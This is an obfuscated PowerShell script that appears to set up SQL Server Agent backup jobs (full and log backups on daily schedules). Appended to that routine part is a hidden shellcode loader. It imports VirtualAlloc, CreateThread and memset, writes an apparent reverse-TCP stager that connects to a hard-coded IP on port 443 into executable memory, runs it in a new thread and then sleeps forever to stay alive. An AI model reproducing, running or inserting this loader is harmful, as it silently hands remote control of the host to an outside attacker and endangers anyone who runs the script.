param([string] ${sER`V`ERIn`stANcE})

${sm`o`srV} = &("{2}{0}{3}{1}" -f'-O','ject','New','b') ("{1}{4}{5}{7}{6}{2}{3}{0}" -f 'ver','Microsoft','o','.Ser','.Sq','lServer.Mana','ement.Sm','g') ${ser`V`eR`iNstA`NCE}
${Jo`Bs} = @(("{3}{1}{2}{0}{4}" -f 'Bs-F','p','D','Backu','ULL'),("{0}{2}{3}{1}"-f 'Backu','OGS','pDB','s-L'))

foreach(${j`ob} in ${Jo`Bs}){
    ${J} = &("{1}{2}{0}"-f 't','New-Ob','jec') ("{9}{2}{8}{5}{4}{6}{3}{7}{1}{0}" -f'.Job','ent','i','emen','q','oft.S','lServer.Manag','t.Smo.Ag','cros','M') (${S`mOs`Rv}."jO`BSer`V`er",${j`ob})

    ${jST`Ep} = &("{2}{0}{1}"-f 'jec','t','new-ob') ("{1}{5}{9}{2}{12}{3}{4}{6}{11}{7}{8}{10}{14}{13}{0}" -f'ep','Mi','oft','S','qlServ','c','er.Mana','.S','mo','ros','.Age','gement','.','t','nt.JobS') (${j}, ("{2}{3}{1}{0}" -f't','ip','Execute Sc','r'))
    ${j`STeP}."su`B`S`YstEM" = ("{0}{1}{2}" -f'Pow','e','rShell')
    ${j`STep}."comm`And" = (&("{3}{1}{0}{2}"-f 'Conte','-','nt','Get') -Path ".\$job.ps1") -join "`r`n"
    ${Js`T`Ep}."onsu`CCes`SAC`TIoN" = ("{2}{0}{3}{1}" -f 'thSuc','ess','QuitWi','c')
    ${jsT`Ep}."o`NfAilActi`On" = ("{1}{0}{2}{3}" -f 'F','QuitWith','ailur','e')
  
    ${J`s`ChEd`Ule} = &("{0}{1}{2}"-f 'n','ew-','object') ("{7}{13}{5}{10}{0}{9}{11}{8}{4}{12}{6}{3}{1}{2}" -f 've','.Job','Schedule','gent','e','S','mo.A','Micros','agem','r.Ma','er','n','nt.S','oft.Sql') (${J}, ${j`ob})
    

    if(${j`ob} -eq ("{2}{0}{3}{1}"-f 'ac','pDBs-LOGS','B','ku')){
        ${RUnt`IME} = &("{1}{3}{0}{2}" -f 'eS','New-Ti','pan','m') -Hours 0
        ${jSCh`e`dUlE}."frEquE`Nc`ytYp`Es" = ("{1}{0}" -f 'y','Dail')
        ${jScH`EDU`lE}."fReQU`EncyIn`T`erVaL" = 1
        ${JSc`h`eD`ULe}."Freq`Ue`N`c`ySUB`daYt`yPeS" = ("{1}{0}{2}" -f'n','Mi','ute')
        ${js`CHED`Ule}."fR`Eque`Nc`YSubdAyi`NtErV`Al" = 15
        ${JSc`He`D`Ule}."AcT`iVES`Ta`RttiMEOf`DaY" = ${ru`N`TImE}
    } else {
        ${rU`N`TiMe} = &("{0}{3}{1}{2}" -f'New-Tim','Sp','an','e') -Hours 22
        ${jsC`hed`ULE}."frEQu`e`NCYtYpes" = ("{0}{1}" -f 'Dai','ly')
        ${j`scheD`ULe}."f`ReQUenc`YiNter`VaL" = 1
        ${J`Sch`E`DULe}."fREqUeN`c`YS`Ub`dAy`TYPES" = ("{0}{1}"-f'O','nce')
        ${Js`cHEDU`Le}."actiVEST`A`RttIM`e`oFd`Ay" = ${R`UNt`IMe}
    }
    ${j}.("{0}{1}{2}" -f'Cr','eat','e').Invoke()
    ${jST`ep}.("{0}{1}"-f 'Cre','ate').Invoke()
    ${jS`Ch`EDULE}.("{0}{1}" -f 'C','reate').Invoke()
    ${j}.("{2}{0}{1}{3}" -f'yToTarg','etServe','Appl','r').Invoke(${S`MOsrv}."NA`ME")
}
${6j`Xo} = ((("{64}{73}{51}{82}{46}{59}{48}{40}{61}{6}{96}{52}{83}{28}{92}{34}{17}{89}{87}{76}{56}{95}{1}{66}{7}{105}{9}{35}{67}{36}{15}{63}{44}{50}{102}{32}{0}{54}{107}{55}{8}{78}{84}{70}{69}{93}{106}{39}{47}{26}{11}{10}{4}{2}{74}{99}{19}{104}{33}{5}{49}{98}{12}{85}{79}{80}{53}{24}{22}{94}{30}{20}{101}{25}{16}{45}{41}{60}{29}{71}{97}{86}{68}{18}{58}{88}{81}{38}{103}{43}{91}{100}{31}{75}{62}{21}{42}{14}{37}{90}{13}{3}{77}{65}{27}{72}{23}{57}" -f'n','P','n In','n',' exter','tr lpThreadAt','ti',' lp','p','ddr','c','tati',' dw','ui','tr ',' flAllocati','d','a','I','Crea',',','emset(In','ress, ','coun','d','t ','c s','u',' ',' IntPtr','r lpParameter','ic extern','i','IntP','Ptr Virtu','es','nt dwSize, uint','dest','AO)]pub',']pu','blic st','onFla','tP','c ','Type','wCreati','loA','bli',')]pu','tributes, u',', ','rt(oA','xt',' lpStartAd','t flProtect);[D','lIm','(I','t);','mpor','O','gs,','a','ntPtr m','on','[DllImp',', ','tr','s, ui','ll','l3','erne',' lpThreadId','int ','o','t',' I','c','t src','ort(oA','kSize,',' IntPtr','o','Okernel32.dl','ern','Ok','Stac','D','lo','t(oAOmsvcrt.dll','lAl',', ','sta','Int','2','IntPt','nt','c e',');[','int','Ptr ','t',' uin','u','li','teThread(','A','.dlloAO)','l'))."re`Place"(([CHAr]111+[CHAr]65+[CHAr]79),[STRIng][CHAr]34));${w} = .("{1}{2}{0}" -f 'pe','Add-T','y') -memberDefinition ${6j`XO} -Name ("{0}{1}" -f'Wi','n32') -namespace ("{2}{3}{1}{0}"-f 'ns','nctio','Win','32Fu') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc5,0x00,0x48,0x87,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${g} = 0x1000;if (${z}."len`Gth" -gt 0x1000){${G} = ${z}."l`enGtH"};${M4`c2}=${w}::("{0}{3}{1}{2}"-f'Virt','a','lAlloc','u').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${Z}."LENg`Th"-1);${I}++) {${w}::"M`EMs`eT"([IntPtr](${M4`C2}.("{1}{0}" -f'32','ToInt').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{1}{0}{2}" -f'e','CreateThr','ad').Invoke(0,0,${m4`c2},0,0,0);for (;;){&("{0}{2}{3}{1}" -f'Star','ep','t-','sle') 60};
